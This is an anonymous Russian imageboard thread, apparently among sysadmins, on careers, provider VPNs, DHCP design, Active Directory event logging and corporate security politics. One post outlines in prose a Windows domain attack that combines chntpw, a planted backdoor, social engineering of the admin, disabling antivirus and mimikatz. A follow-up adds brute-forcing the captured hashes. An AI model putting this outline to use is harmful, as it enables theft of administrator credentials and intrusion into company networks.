Ты с ума сошел что ли? КАК из админа может получится программист? Говнокодер разве что какой-нибудь выйдет на скриптовых языках.
Программист это работа, требующиая светлого ума. Те, кто может стать программистами, в админы не идут.
Аноним 15/01/18 Пнд 08:25:57 #590 №1163161 
>>1163036
>с перспективой съёба в гейропу или асашай
Тогда это надо было садится совсем на другой стул.
Аноним 15/01/18 Пнд 08:28:29 #591 №1163162 
>>1163036
>Есть два стула - ccna и далее / mcsa и далее.
тут только ты сам можешь для себя определить что тебе ближе. Забаботать зласчастныю сотку в месяц в ДС можно как сетевиком, так и виндоадмином. Насчет асашай это ты перегнул, как я уже выше ответил.
Админ это не та работа, кого там встретят с распростертыми объятиями. Зачем брать тебя, если полно индусов с гражданством и языком? Накой ты - русский Ваня - там нужен? Домен админить что ли? Сами справятся.
Аноним 15/01/18 Пнд 08:31:52 #592 №1163165 
Насчет замены админов нейросетями соглашусь.
Большинство работы рядового админа на данный момент — это рутина с неким техническим уклоном. (Создание учеток в AD, прописывание вланом на интерфейсах, пердолинг iptables и тому подобная херня.) Уже сейчас, полагаю, можео все это автоматизировать. И 80 процентов работы админа вообзще отпадет. Останется те 20% которые отведены на внедрение различных решений. А этим уже займутся интеграторы. А ты, админ, бери в руки метлу и начинай привыкать к конкурентной берьбе с нашими братьями из Средней Азии.
Аноним 15/01/18 Пнд 08:49:51 #593 №1163174 
>>1163160
>Программист это работа, требующиая светлого ума. Те, кто может стать программистами, в админы не идут.
Как бывший программист, ушедший в админство, могу сказать, что это всё заблуждения. 90% программистов - говнокодеры, которые 20% времени занимаются написанием небольших фич и 80% времени поиском багов в чужом коде. Короче, никакой светлой головы не нужно, если ты не краснодипломник ВМК МГУ, работающий звездой в области машинного обучения или биг дата... Но таких реально единицы и ты либо уже такой, либо таким тебе никогда не стать. Понимание этого к кому-то приходит через несколько лет, кому-то через десяток другой, а в итоге либо смиряешься, либо меняешь область деятельности на ту, в который ты можешь стать хоть чуть-чуть чем-то большим, чем просто мелкой шестеренкой на 100 строк кода в проекте, где этого кода миллионы строк...

>>1163036
Поинтересуйся каких вакансий в гейропке больше, вот тебе и ответ. По Москве могу сказать, что вакансий сетевиков гораздо меньше, чем виндовз-админов, однако устроиться сетевиком проще. Во-первых, потому что среди вин-админов адская конкуренция, во-вторых, потому что под вин-админов попадают и многочисленные шива-вакансии. Вот только ccna, конечно, ни о чем, - это уровень техподдержки, для 60-100к тебе нужен уровень не ниже ccnp, можно без сертификатов.

>>1163165
Ты ведь тот траль? Я тебе уже писал, что ты нихуя не разбираешься в IT, напишу еще раз:

>создание учеток в AD
Есть такая штука, как identity management системы - учетки новым сотрудникам сразу во всех нужных информационных системах создаются прямо в отделе кадров, при оформлении на работу...

>прописывание вланом на интерфейсах
В ЦОДах обычно интерфейсы в транках, а транк на вланы разбирает уже сам гипервизор. На доступе используют 802.1x - комп авторизуется по сертификату и радиус сервер на основе этой авторизации назначает порт в нужный влан. Технологии много лет уже, кстати, т.е. она и задолго до всяких SDN была.

>пердолинг iptables
Приличные NGFW фаерволы, вроде PaloAlto или Checkpoint давно уже (несколько лет как) динамически создают и применяют правила для сетевых сессий разных пользователей, т.е. узнают что трафик принадлежит Васе и применяют политику для всех групп, в которые Вася входит...

Да, такие штуки внедряют интеграторы, но вот эксплуатацией занимаются местные специалисты, т.к. если что-то, вдруг, упало, то реакция нужна немедленная, а никакой контракт с интегратором ее гарантировать не может. Если он вообще есть... потому что местных спецов держать дешевле.
Аноним 15/01/18 Пнд 08:58:42 #594 №1163176 
>>1163174
>Ты ведь тот траль? Я тебе уже писал, что ты нихуя не разбираешься в IT, напишу еще раз
Ты только что подтвердил то, что я написал выше.
Всё до простоты автоматизировано. И не требует глубокихъ знангий и вшемательства админа. И внедряется интеграторами. И динамически всё назначается и т.д. и.т.п.
Так получается, что админы УЖЕ нахрен не нужны. Взял макаку, которая по мануалам будет эксплуатировать весь парк и хватит. Если что - поможет интегратор.
Аноним 15/01/18 Пнд 09:09:16 #595 №1163195 
>>1163176
Не, это ты снова подтверждаешь, что не имеешь никаких представлений о том как всё это на самом деле устроено, раз считаешь, что для обслуживания подобных информационных систем не нужны квалифицированные специалисты...
Аноним 15/01/18 Пнд 09:16:19 #596 №1163200 
>>1163195
>информационных систем не нужны квалифицированные специалисты...
Нужны, но теперь вместо четырех сотрудников хватит одного-двух.
Аноним 15/01/18 Пнд 09:31:03 #597 №1163204 
>>1163200
И снова ты не прав. Один админ в принципе быть не может, ведь он может уволиться/умереть/шантижировать с огромными потерями для бизнеса. Нужно минимум двое, но если один умер/уволился, то мы оказались в предыдущей ситуации... Т.е. нужно минимум 2-3 человека. При том 2-3 сетевика, 2-3 виндовс-админа, 2-3 человека, отвечающих за работу инфраструктуры (сети и системы хранения данных, блейд-сервера, виртуализация), дальше нужно 2-3 человека по каждой крупной информационной системе, базе данных... Не слабый такой штат уже выходит. И это уровень среднего бизнеса, в крупняке столько человек может в каждом региональном филиале сидеть!

Ну а в мелком бизнесе, где нет всех этих автоматизаций, как раз-таки и нужно много человек, чтобы делать рутинные операции, при том хоть кто-то из этих людей должен быть способен что-то внедрить - как-то ведь там та же адешечка появляется... и ведь не руками сисинтеграторов, услуги которых мелкому бизнесу явно не по карману.
Аноним 15/01/18 Пнд 09:56:06 #598 №1163207 
Сетевики, два вопроса к вам:
1. На уровне ядра сети кроме RSTP и port-channel ещё что-то используется? или не
2. Как выглядит VPN от провайдера? Как выглядит он для сетевика, просто нешифрованный маршрут в сети провайдера, или нечто большее? Как он настраивается для сетевика, достаточно добавить ip route или надо ещё добавлять ipsec на интерфейс и всё шифровать? В чём плюсы в сравнении с обычным VPN
Аноним 15/01/18 Пнд 10:13:07 #599 №1163211 
>>1163207
1. На ядре терминируются вланы, работает dhcp, может быть даже фильтрация. Ну и маршрутизация может быть, например, площадка в stub зоне, и эта зона на ядре крутится вместе с бэкбондом до роутера. Вообще понятие "ядра" весьма широкое - пара нексусов в ЦОДе тоже ядро, но там, куча совершенно других технологий и протоколов может применяться, например вместо port-channel будут VPC домены...

2. VPN от провайдера бывает L2 и L3. В обоих случаях твои езернет фреймы или ip пакеты гонятся через транспортную MPLS сеть провайдера, внутри его сети твой трафик изолирован от трафика других пользователей и интеренета. Отличие от VPN поверх интернета очевидно - в интернете твой трафик будет доступен всем узлам, через которые пройдет, плюс ты никогда не можешь предсказать что это будут за узлы. Т.е. в случае VPN от провайдера, не обязательно что-то шифровать, если доверяешь провайдеру, т.к. твой трафик будет доступен только ему одному.

Для сетевика настраивается всё очень просто - втыкаешь линки на двух площадках. Если это L2, то вешаешь серые адреса из одной подсетки и всё работает, как будто у тебя один большой сегмент сети. Если это L3, то у тебя будут Ip-адреса на интерфейсах до провайдера, т.е. чтобы связать две площадки придется сделать маршрутизацию, при этом, очевидно, ты уже не можешь использовать одинаковые подсетки с двух сторон. В случае vpn через инет, у тебя будет какой-нибудь gre тунель, т.е. тоже нужна будет маршрутизация.

Всякие ipsec во всех случаях вешаются поверх внешних интерфейсов и настраиваются политики, чтобы ipsec применялся только к нужному тебе трафику на этих интерфейсах. В случае vpn через инет можно применять ipsec только к трафику внутри GRE-туннеля, т.к. повесить ipsec на GRE-интерфейс.
Аноним 15/01/18 Пнд 10:23:57 #600 №1163214 
>>1163211
>работает dhcp
Это да, забыл написать


>т.к. твой трафик будет доступен только ему одному.
А если провайдеров несколько, например в начале пути - это МГТС, а в втором офисе Билайн не говорим про всякие там провайдеры сотой мили

>Всякие ipsec во всех случаях вешаются поверх внешних интерфейсов и настраиваются политики, чтобы ipsec применялся только к нужному тебе трафику на этих интерфейсах
Это ясно дело

То есть провайдер может изолировать твой маркированный всякими VPLS/MPLS флагами трафик от остальной сети? Но при этом может тебя на хую покрутить, если ты его не зашифруешь?
Аноним 15/01/18 Пнд 11:15:26 #601 №1163236 
>>1163214
>если провайдеров несколько
Тогда, скорее всего, они просто предоставляют тебе интернет, а не L3/L2 VPN. Да, бывает, что последнюю милю провайдер арендует у другого прова, но оборудование он всё равно ставит свое, конечно.

>провайдер может изолировать твой маркированный всякими VPLS/MPLS флагами трафик от остальной сети?
Провайдер заводит каждого клиента в свой VRF, внутри которого и MPLSит твои пакеты по своей сети, т.е. да они никогда не пересекутся с чужим трафиком, а если такое, вдруг, случится, скорее всего, у тебя где-то что-то упадет и ты напишешь провайдеру заявку, чтобы он это дело починил.

>Но при этом может тебя на хую покрутить, если ты его не зашифруешь?
Ты имеешь в виду проснифать твой трафик и украсть какую-нибудь внутреннюю инфу? Теоретически может. Практически ни один пров этим занимать не будет - если поймают, то прикроют сразу весь бизнес этого провайдера. Может ли он это по решению суда или запросу из ФСБ? Может и даже обязан будет... Может ли какой-нибудь один админ прова поиметь крупного клиента? Крайне маловероятно. Помимо доступов и навыков, нужно сделать так, чтобы никто ничего не заметил, плюс риски при поимке очевидно какие - в лучшем случае тюремный срок, в худшем, тебе устроят несчастный случай те, кого ты поломал (даже крупный бизнес у нас до сих пор по бандитским понятиям живет к сожалению). Не представляю, чтобы кто-нибудь на такое решился... Ну и служба безопасности проверяет людей, перед наймом, т.е. если у тебя родственники сидели или ты засветил свои сомнительные связи в прошлом (общался с теми, кто судим за IT-преступления, например), то тебя просто не возьмут на работу, чтобы не рисковать лишний раз. Олсо такие случаи мне известны - коллегу не взяли в крутое место, т.к. у его бати много лет назад была судимость за экономическое преступление какое-то...
Аноним 15/01/18 Пнд 11:28:19 #602 №1163247 
Кстати, вот зашла речь про dhcp, разжуйте как его правильно настраивать в не плоской сети, в которой куча вланов, и в которой несколько филиалов соединённых site-to-site vpn.
Аноним 15/01/18 Пнд 11:36:42 #603 №1163250 
>>1163236
>чтобы он это дело починил.
У нас уже такое было, когда наш МТС завернул часть нашего трафика во внешний мир, но это было до того как я пришёл работать в это место, подробностей не знаю, знаю, что дело замяли выполненной заявкой о сломанном сервисе. У нас крупная антипутинская контора, ничего больше говорить не стоит, и есть вероятность, что нас прослушивало ФСБ

>крупный бизнес у нас до сих пор по бандитским понятиям живет к сожалению
Не знаю, но наш уже так не живёт, у нас не убивают и калечат, может где-то есть, но думаю, что крайне редко
А про приехать и ноги сломать - это российский менталитет, у нас так люди делают, вот ты машину мне запер, а я подожду и ноги тебе сломаю, наверное, для нашего бизнеса - это завести уголовное дело против кого-то, или сделать проверку, а там настоять на уголовном деле против сотрудника

>тебя просто не возьмут на работу, чтобы не рисковать лишний раз
Я знаю, я и есть СБ, мы не берём, ещё и на полиграф сажаем все ключевые позиции

я просто неплохой линуксойд и виндузятник, но плохой кисочник
Аноним 15/01/18 Пнд 11:37:14 #604 №1163251 
>>1163247
https://www.youtube.com/watch?v=MoElaNJn-9w&t=352s

Держи, братишка
Аноним 15/01/18 Пнд 11:42:10 #605 №1163252 
>>1163251
Норм, спасибо.

Остальные видосы на канале смотреть стоит? У меня некоторые пробелы по сетям.
Аноним 15/01/18 Пнд 11:46:40 #606 №1163254 
>>1163247
Если несколько филиалов, с различающимися подсетями и маршрутизацией поверх vpn, то очевидно, что нужно делать локальный dhcp в каждом филиале. Если сеть уровня энтерпрайза, т.е. L2/L3 vpn и в КАЖДЫЙ филиал есть резервный канал, то тогда можно dhcp централизовать для удобства управления, а на самих площадках прописывать ip address-helper [shcp_server_ip] для проброса бродкаста на центральный dhcp.

>>1163252
Стоит. Неплохой канал.

>>1163250
>у нас не убивают и калечат, может где-то есть, но думаю, что крайне редко
Не знаю, насколько оно часто встречается, но точно встречается. Почти весь крупный бизнес в рашке в руках бывших бандитов, методы у них соответствующие.

>нас крупная антипутинская контора
Как там в штабе Навального?

Аноним 15/01/18 Пнд 12:17:22 #607 №1163271 
>>1163254
>Как там в штабе Навального?
Хуёво, владелец конторы уже не в рахе, я думаю, что пора съёбывать, вот и почитываю про сиськи для общего развития

>>1163254
>>1163247
>то тогда можно dhcp централизовать для удобства управления
Хз, я бы так не стал делать, одна локация - один DHCP, только если это не совсем крошечный филиал на 1-2 ПК, да и те лучше настраивать хотя бы на роутер
А вообще ты должен помнить, что AD DS и авторизация без DNS не работает, поэтому DHCP это только одна из проблем.
Я делал так:
Если филиал на 3-5 ПК, то там стоял только роутер, хотя у меня всегда был обычный SSL_VPN, так как он больше нравится, так вот, там был роутер уровня микротика, и без l2/l3 от провайдера, да и провайдеров был вагон, так как где-то были только 4g без вариантов, а где-то лучшую цену давали МГТС, где-то местные крохи-провайдеры, там свой DHCP, DNS и домен в офисе, второй DNS от провайдера, если канал падал, то всё работало внутри сети, лимит стоял на 50 авторизаций без входа в домен, как правило это более чем хватало, так как больше чем пары часов канал не лежал, а 50 авторизаций тебе хватит чуть ли не на неделю без домена, а то и на месяц.
Если филиал был крупный, на компов 20+, тогда уже делал полноценный контроллер домена

У нас была строительная фирма, как правило мелкие объекты - стройки, там метами вообще приходилось ставить обычные ASUS RT-AC66u, так как на объекте 2 ноута и принтер, им кроме вайфая ничего и не нужно, и интернет, чтобы кино посмотреть, а было пару филиалов, с инженерами, там уже ставил второй контроллер домена. Хотя филиалы были мелкие до 30пк, с одним ВЛАНом на всё, без натива
Хотя тут сетивеки меня за анусы могут говном закидать, так как вланов в нём нету

Ты вообще можешь спрашивать
Аноним 15/01/18 Пнд 12:38:10 #608 №1163287 
>>1163271
В целом верно всё говоришь. Другое дело, что у нас в энтерпрайзе другие масштабы. Есть только одна площадка всего с двумя вланами, где в одном висит сразу и принтер, и комп, а в другом IP-телефон. Но в целом мелкая для нас - это площадка не из одного человека, а пользователей на 20-50. Для такого количества никто не будет выделять стойку, ставить ИБП, локальные сервера с контроллером и т.п. Плюс если от ЦОДа площадка отвалится - информационная система всё равно работать не будет, а без этого бизнес практически встанет. Поэтому везде два канала, а локальные сервера есть только на очень крупных площадка на несколько сотен рабочих мест, как правило, там есть и локальные информационные системы, но всё равно 2-3 канала до ЦОДа... Там где нет второго канала L2 vpn - есть локальный инет и тунели до ЦОДа через него. Обычно на таких площадках инет еще используется для касс и эквайринга, чтобы оплату можно было принять в любом случае, т.е. даже если ЦОД упадет.

Что до авторизации в AD, то там таймаут и кэш по времени, а не по количеству авторизаций, вроде. Он по умолчанию что-то с неделю позволяет входить в комп без доступности контроллера...

>Ты вообще можешь спрашивать
Про что? Про Навального? Мне не очень интересно. Я не поддерживаю Путина и его политику, но и не вижу возможности поддержать кого-то другого. Тот же Навальный, очевидно, не сможет справиться с управлением страной - у него нет и никогда не было понимания как сделать из России процветающее государство. Хуже того, нет никакой уверенности, что у него вообще есть подобная цель...
Аноним 15/01/18 Пнд 12:47:30 #609 №1163292 
>>1163287
> в AD, то там таймаут и кэш по времени
Точно, там 50 - это количество записей в кеше, уже и забывать стал

Я ставил домена ны 20-30 ПК только из-за интернета, так как из экономии не везде были резервы, кек, да и нагрузку снять на слабые 10-20мбит/сек каналы
Аноним 15/01/18 Пнд 13:06:41 #610 №1163301 
>>1163292
>уже и забывать стал
Винда - это пиздец, если честно. Грузишься в кали, делаешь chntpw, чистишь кэш GPO, грузишься в винду без сети, делаешь закладку, которая позже позволит тебе расширить права до админских. Перезагружаешься уже с сетью, звонишь админу - дескать у тебя проблема какая-то серьезная, просишь его посмотреть. Он заходит на твой комп... Дальше повышаешь права до админских, убиваешь антивирус, запускаешь мимикац, получаешь пароль админа. Ну или хэш пароля, если винда новая. Тоже не плохо.
Аноним 15/01/18 Пнд 13:09:33 #611 №1163304 
>>1163301
А что дальше с хэшем делать?
Аноним 15/01/18 Пнд 13:28:42 #612 №1163316 
>>1163304
Брутить по словарям, потом радужными таблицами. Обычно у админов в мелко-средне конторах пароли уровня Zm3ev1k, или !Comany123# т.е. пароли с низкой энтропией и брут вполне реален. А до выхода 8-ки так и вовсе прямо сам пароль в памяти висел. ХЗ когда попатчили это в 7-ке, но найти дырявую систему вполне реально. Вплоть до того, что можно ее поставить вручную и самому завести в домен - по умолчанию это любой пользователь может сделать...

Не знаю, есть ли здесь виндовс-админы, но если есть, пусть они сами расскажут как защищают свои адешки и защищают ли вообще. Я если что, сетевик и виндой уже очень давно не занимался, не уверен, как оно там сейчас всё.
Аноним 15/01/18 Пнд 14:01:50 #613 №1163327 
>>1163301
в большой компании ты будешь общаться с СБ уже где-то минут через 25

Аноним 15/01/18 Пнд 14:06:38 #614 №1163328 
>>1163327
Скажем так, в большой компании гораздо выше вероятность того, что такие действия вообще заметят, но насколько оперативно и заметят ли вообще - это большой вопрос. В ряде мест компы выпадающие из домена/касперского и пребывающие в таком состоянии по несколько дней - это норма... А на этапе внедрения новой площадки, вообще может черте что твориться, т.к. сроки все сорваны и нужно быстрее развернуться, а о безопасности начинают думать только после запуска объекта. Обе ситуации лично встречал.
Аноним 15/01/18 Пнд 14:40:49 #615 №1163340 
Короче, я проебал всё по собственной глупости и теперь сижу с дипломом токаря. Хочу сисадмином быть. Нравится ковыряться в компьютерах, освоил линукс, могу в виртуализацию через qemu/kvm.
Интересует вакансия помощника сисадмина(читай эникей). Что там вообще делать? Типа офисная тех.поддержка?
Пиздец, мне стыдно даже с моим дипломом на собеседование идти.
Подгорает ещё от того, что в повальном большинстве случаев, в компаниях используют парашный windows server, а я уже слишком привык к никсам.
Ну и собственно платиновые вопросы: что подучить? Что требуют на таких работах?
Аноним 15/01/18 Пнд 14:58:57 #616 №1163354 
>>1163340
Нет никаких проблем, ищи работу по линуксам. Она есть её достаточно, на начальный уровень тоже.
Аноним 15/01/18 Пнд 15:26:18 #617 №1163365 
>>1163301
>chntpw
Так-то да, можно хеш пароля с любого загрузятора вытащить, даже кали не нужен, при условии, что биёс не запаролен, а комп не опломбирован замком

Насколько я знаю фиксится обычный раздачей прав, так, что на одной локации в ГПО в локальные админы добавляется только конкретные УЗ, на другой другие, ясен хуй с домен админа никто не загружается, для каждого сервиса своя УЗ, ну то есть норма делать просто логин для сотрудника и отдельный для домен админа, а третий для энтерпрайз админа, и везде разные пароли, кек
Как итог одна УЗ локального админа может обслужить только 100-200 ПК максимум, и в целом не должна иметь больших прав, но зачастую, как мы все знаем, юзается локаладмин с паролем на уровне 87654321, который бесправный в домене, но зато все залиты с одного образа и одним паролем

По ИБ подразумевается, что ты не сможешь ничего загрузить, что может нарушить целостность шиндоус, из ОС тебе прав не хватит, а из EFI - БИОС, ну кек, короче, по поводу вытащить хард и унести отдельная тема, не будем её вскрывать эту тему

Аноним 15/01/18 Пнд 15:35:44 #618 №1163373 
>>1163165
>Уже сейчас, полагаю, можео все это автоматизировать
Ну пиздуй, автоматизируй, хули ты.

>>1163340
>Короче, я проебал всё по собственной глупости и теперь сижу с дипломом токаря
Диплом токаря это лучше чем ничего. А если ИТ заебёт можешь обратно станкам откатиться.
Аноним 15/01/18 Пнд 15:50:44 #619 №1163377 
Забыл сказать
>>1163327
тут ты прав>>1163328, у нас так и есть, сидим в два ИБшника, на 6к людей, скорость реагирования низкая, ввели SIEM для собора и анализа логов, сейчас пытаемся внедрить машин лёрнинг для поиска отклонений, но сейчас по сути, если УЗ какого-то админа на локации будет найдена по радужной карте, то с огромной долей мы можем проебать это, реакция будет только на количество операций или очень специфичный евент, как 1102 (вроде такой у удаления журналов). У нас только 4624 - успешный вход, в сутки около миллиона событий, а на общем фоне мусорного доступа так вообще нереально разобраться, пока успешность внедрения машин лёрнинга на нуле. отсюда и появляются всякие делегирования прав и бесправность, сервисные УЗ под одну задачу и тп, по всяким там ПСИ ДСС или ИСО у 1 сотрудника должна быть персональная УЗ c доступом не больше 1 сервиса, так как 1 юзер может осуществлять не больше 1 роли администрирования, винда - виндузятнику, линукс - линуксойду, сеть - сетевику
Аноним 15/01/18 Пнд 15:53:23 #620 №1163384 
>>1163165
Красавчик, ты отстал лет на 10, это всё уже есть, но админы придумывают новые вирусы и софт, чтобы их не увольняли

>>1163340
У меня друг руководитель сетевиков в интеграторе, по образованию филолог, твой диплом никому не важен, важны только сертификаты, тебя разве, что в газпром не возьмут, там минимум МГУ
Аноним 15/01/18 Пнд 16:17:48 #621 №1163412 
>>1161223
>>1161258

БАМП вопросу, парни из энтерпрайза, неужели нет железячных решений или схемы?
Аноним 15/01/18 Пнд 16:21:35 #622 №1163415 
>>1163412
https://serverfault.com/questions/331079/haproxy-and-forwarding-client-ip-address-to-servers
Аноним 15/01/18 Пнд 19:52:00 #623 №1163637 
>>1163354
В ДС.
Аноним 15/01/18 Пнд 20:19:00 #624 №1163659 
>>1163637
Да не правда, и не в ДС есть, по своему опыту знаю.
Аноним 16/01/18 Втр 08:42:00 #625 №1163916 
>>1163384
>в газпром не возьмут, там минимум МГУ
Куча знакомых из МГУ и что-то никого их них не зовут в газпром. А вот в яндексы/авито зовут. Правда если ты с мехмата или вмк... В газпроме, скорее, связи важны, а за связями нужно куда-нибудь в плешку. Правда и оттуда у меня знакомый есть - работает аналитиком в самсунге, лол. Короче, корка почти ни на что не влияет. Разве что в гос структурах на высокие управляющие должности не возьмут.

>>1163365
>одна УЗ локального админа может обслужить только 100-200 ПК максимум
Ну тут смотря что значит "обслуживать", у нас вот на 3к пользаков всего три виндовс-админа... Ясен хуй, на каждый комп с доменной учеткой они не ходят. А под какими учетками локально сидет - в душе не ебу, я ж не шпион...

>>1163377
Да на самом деле нихера вы не сделаете. Единственный вариант - это агент на каждый комп, который отслеживает то, что реально нужно отслеживать и собирает в БД. А то ведь в домене невозможно даже определить какой пользователь в какие компы залогинен! Событий же входа/выхода и правда генерируется слишком много. Олсо для них вам не машинное обучение нужно, а какой-нибудь эластик серч и корреляционный анализ логов с самых разных источников, ведь одних контроллеров домена в сети может быть несколько десятков.
Аноним 16/01/18 Втр 09:28:26 #626 №1163922 
15252143124.PNG
125123124.PNG
>>1163916
>корка почти ни на что не влияет
Корка действительно может быть показателем знаний, я это понял только к 27 годам, когда приходят ребята из физтеха или мгупи и разница в их знаниях огромная, и первые умеют и жопу рвать, и осваивать новый материал, а вторые хотят только 9-18 и зп

>>1163916
>Ну тут смотря что значит "обслуживать"
Домен одмен не будет логинется на юзер-пк, так как избыточность, на каждом ПК есть локальная группа Администраторы, куда по дефолту входят "домен одменс", но принято, через ГПО на определённую ОУ вешать группу юзеров, которая добавляется в локального админа каждой рабочей станции, чтобы эникей имел права Локального Одмена, но только в своей ОУ (локации обслуживания), и не более

>>1163916
> то ведь в домене невозможно даже определить какой пользователь в какие компы залогинен!
Можно, на контроллерах эвент 4624, просто каждый успешный логин он генерирует 4624 с определённым type (SMB RDP и прочие), просто когда много людей, то эвентов, как я писал выше, слишком много

>>1163916
>Единственный вариант - это агент на каждый комп, который отслеживает то, что реально нужно отслеживать и собирает в БД
Агенты и так есть, и это норма: ДЛП (может мониторить любой протокол передачи информации, SMB, RDP, Removable storage, https, ftp, всё, что хочешь), Антивирус (он может делать в буквальном смысле всё, даже блокировать файлы для пользователей по хешу, хотя всё от антивиря зависит, запрещать USB порты, определённые флешки с определённым ID, вообще все), есть всякие TimeInformer (почитай в гугле подробней, он мониторит каждый клик пользователя и делает скриншот), агентов много, просто они очень избыточны, и даже с тысячами фильтров дают овер событий, если событие чётко не определено (запуск вируса, копирования телефонных номеров, удаление журнала), то хуй его просто так отследишь
>>1163916
>какой-нибудь эластик серч и корреляционный анализ логов с самых разных источников, ведь одних контроллеров домена в сети может быть несколько десятков
А у нас он и есть с платной подпиской на машин лёрнинг, у нас и есть десяток КД и десяток ДХЦП, плюс 4 эксчейнджа
Ещё раз, у нас такое количество событий, что чтобы подгрузить эвенты за сутки-двое надо потратить минут 5, при том, что эластик стоит на самых быстрых дисках в СХД, просто пиздец короче. Плюс, есть проблема с нагрузкой, у админов есть своя работа, и им нужно выполнять всякие скрипты и сценарии, от чего в кибане можно наблюдать пикрл, где сервисные УЗ выдают сотни тысяч эвентов каждый час, мы их не можем отследить глазами, для этого понадобиться отдельный человек, который сутками будет торговать лицом в события, поэтому и была предпринята попытка ввести машинлёнинг (2 пик без эвентов успешного логина 4624 и логофффа 4634, так как там просто пиздец будет, я даже запрос не смогу выполнить)

Короче, в плане ИБ большой продакшен полная пизда, так как на тебя начинают ссылаться если в отделе нету продаж, мол из-за блокировок ИБ, ойтишники постоянно пытаются сделать тебя крайним: "у юзера не работает скайп - виновто ИБ, не работает печать - ИБ", так как ИБ может блокировать приложения, а разобраться на месте никто не хочет. Приходится делать множество компромиссных решений, которые не секьюрны
Аноним 16/01/18 Втр 09:52:34 #627 №1163931 
>>1163922
>каждый успешный логин он генерирует 4624 с определённым type
Так это и есть самая большая архитектурная проблема винды. Нет простого способ включить, например, только отслеживание входов пользователей с ручным вводом пароля во всем домене. Отслеживаются сразу все входы (в т.ч. и автоматические логины учетных записей - компьютеров!) и в итоге тысячи событий, которые уже не несут никакой информации. Поэтому я и предложил поставить агента, который бы фиксировал только то, что реально важно.

>приходят ребята из физтеха или мгупи и разница в их знаниях огромная
Никто не спорит, что в физтехе/мгу подготовка потрясающая и без умения быстро и эффективно учиться в этим места не попасть, а если и попасть, то не окончить. А именно навык быстро учиться новому в IT самый востребованный. Но не стоит думать, что люди без образования или с дипломами всяких МИРЭА сильно хуже. Во-первых, среди них тоже хватает умных и эффективных, во-вторых, требующие 9-18 и ЗП - это рабочие лошадки, без которых тоже никуда.

>начинают ссылаться если в отделе нету продаж, мол из-за блокировок ИБ, ойтишники постоянно пытаются сделать тебя крайним: "у юзера не работает скайп - виновто ИБ, не работает печать - ИБ"
Надо тоже начать жаловаться на наших безопасников, а то они абсолютно всем(!) закрыли гмейл, вконтакт, ютуб и т.д. Спасибо за идею! Правда есть нюанс - у нас иерархия власти уродская. Начальник службы безопасности и IT-дир равны по рангу (формально) и выше них только директор компании - баба, которой похуй о чем там "мальчики" спорят, лол. При том эта баба бывшая любовница реального владельца бизнеса и всё о чем она думает - как бы ее саму не выпиздили, ведь в реальности все ключевые решения принимаются внешней управляющей компанией (ага мы часть огромного конгломерата). Ну и начальник службы безопасности там у них на мази по слухам (да и вся управляшка по ходу - это бывший криминал, силовики, экс чиновники и пр. воры в законы), а IT-дир нет - это приглашенный на время со стороны человек (и их у нас уже о-о-очень много разных было...). Короче, добро пожаловать, в пидорашка-энтерпрайз...
Аноним 16/01/18 Втр 10:18:42 #628 №1163938 
>>1163931
Не, ввод с клавиатуры можно отследить, есть такой тип:
https://habrahabr.ru/company/netwrix/blog/148501/
2 — Интерактивный (вход с клавиатуры или экрана системы)
Но есть другой важный момент - юзеры не выключают ПК десятилетиями, а даже если за ПК садится кто-то другой, он может не разлогинить прошлого юзера, ну и тупой машинлёнинг в ЕЛК не умеет делать корреляцию на конкретные эвенты из коробки, а чтобы написать это руками в QUERY и DQL я слишком тупой, как и наши подрядчики, лол блджат

>>1163931
>или с дипломами всяких МИРЭА сильно хуже
Я не думаю, я же пишу, что такой диплом менее показательный, да и вообще насколько я знаю МИРЭА и МГУПИ больше нету, сейчас это единый МТУ!
И ещё тупые HR-ы, ой бля, заёбывают почему у меня непристойный вуз, и не хочу ли я в 27 лет ещё получить диплом "хотя-бы бауманки", ебанутые мрази

У нас над всем ИТ и ИБ стоит "Бизнес", всем похуй на что там безопасно или нет, разве, что откровенно сливать нельзя
Человеку нужен вконтакт? - клиентам писать, ИБ не согласовало, значит упали продажи
Нужен ютуб? - ролики по продажам смотреть - ИБ виновато
Мы ввели единый гуглхром, к нам приходит один из директоров по продажам (их много), и говорит, что ему похуй на ИБ, и его сотрудникам нужен менеджер паролей как расширение в гугле, мы шлём нахуй, а он "продажи падают, так как пока сотрудник вводил пароль клиент развернулся и ушёл", вот так и живём. Здравого смысла почти нету
Человек судим за убийство и разбой - берём, он понравился на собеседовании ну это хоть 1 раз за год было, не больше

Всё хочу пидорнуть и уйти в интегратор или проломиться в нормальный крупный наебизнес, а вторая работа загрузила так, что вообще нету времени написать резюме и куда-то сходить,
надеюсь к февралю съебу
Аноним 16/01/18 Втр 10:36:14 #629 №1163944 
>>1163938
>пока сотрудник вводил пароль клиент развернулся и ушёл
Какие же продажники дегенераты, пиздец просто.

>Человек судим за убийство и разбой - берём, он понравился на собеседовании
И что? Ну он же не в розыске, честно отсидел лол.

>не хочу ли я в 27 лет ещё получить диплом "хотя-бы бауманки"
Бомбануло.
Аноним 16/01/18 Втр 10:44:19 #630 №1163949 
15154846730740.jpg
>>1163944
Сам бомблю, братишка, сам бомблю
Аноним 16/01/18 Втр 10:50:08 #631 №1163951 
>>1163938
>юзеры не выключают ПК десятилетиями
Принудительную блокировку экрана сделать через 30 минут и автоматическую перезагрузку в ночь с субботы на воскресенье для установки обновлений.

>У нас над всем ИТ и ИБ стоит "Бизнес"
ХЗ как у вас там на самом деле, но в бизнес над всем не верю. Или ты KPI имел в виду? Потому что KPI и у нас тоже все выполняют и перевыполняют, лол...

>хочу пидорнуть и уйти в интегратор или проломиться в нормальный крупный наебизнес
Тоже рад бы уйти куда-нибудь, но жизненный опыт подсказывает, что везде будет примерно тоже самое, на разве что офис получше/похуже и зарплата побольше/поменьше.

>>1163944
>честно отсидел
Суть в том, что он не просто "понравился" - он явно чей-то протеже, при том кого-то, кто сильно выше службы безопасности стоит. Подумай сам, ведь никто с судимостью тебя даже на собеседование не позовет...
Аноним 16/01/18 Втр 10:56:55 #632 №1163954 
15154846730740.jpg
>>1163951
Не, я тебе всё описал как есть, именно так, не KPI, а именно продажи, всё делается для эффективности продаж. Хоть ДЛП внедрили, так как стали слишком много клиентов пиздить, а теперь цифровая утечка перекрыта, только пизди сам хард с пк или фоткай экран.
Аноним 16/01/18 Втр 10:59:29 #633 №1163955 
>>1163931
>Начальник службы безопасности и IT-дир равны по рангу
В принципе, так и надо. Все, что написано дальше, очень хуёво, конечно.
>>1163951
>автоматическую перезагрузку в ночь с субботы на воскресенье
И в это время тоже какая-нибудь сволочь может "работать".
Как вариант VDA и desktop on demand подошло бы, но, опять же,
1) мало ли, почему
>юзеры не выключают ПК десятилетиями,
